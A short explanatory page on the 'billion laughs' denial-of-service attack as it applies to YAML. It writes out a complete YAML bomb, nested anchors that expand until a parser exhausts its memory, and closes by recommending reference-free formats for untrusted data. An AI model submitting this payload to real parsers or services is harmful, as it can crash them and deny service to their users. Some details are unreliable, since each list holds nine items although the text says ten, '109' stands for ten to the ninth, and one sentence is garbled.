Billion laughs attack (YAML Bomb)



The example attack consists of defining 10 entities, each defined as consisting of 10 of the previous entity, with the document consisting of a single instance of the largest entity, which expands to one billion copies of the first entity.

A “Billion laughs” attack should exist for any file format that can contain references,

For example, this YAML bomb:

a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

When a YAML parser loads this document, it seems that  I contain 10 h.  However, “&i” is a defined entity that expands to a string containing ten “&h” strings. Each “&h” string is a defined entity that expands to ten “&g” strings, and so on. After all the entity expansions have been processed, this small (< 1 KB) block of YAML will actually contain 109 = a billion “lol”s, taking up almost gigabytes(3GB) of memory.


For this reason, file formats that do not allow references are often preferred for data arriving from untrusted sources.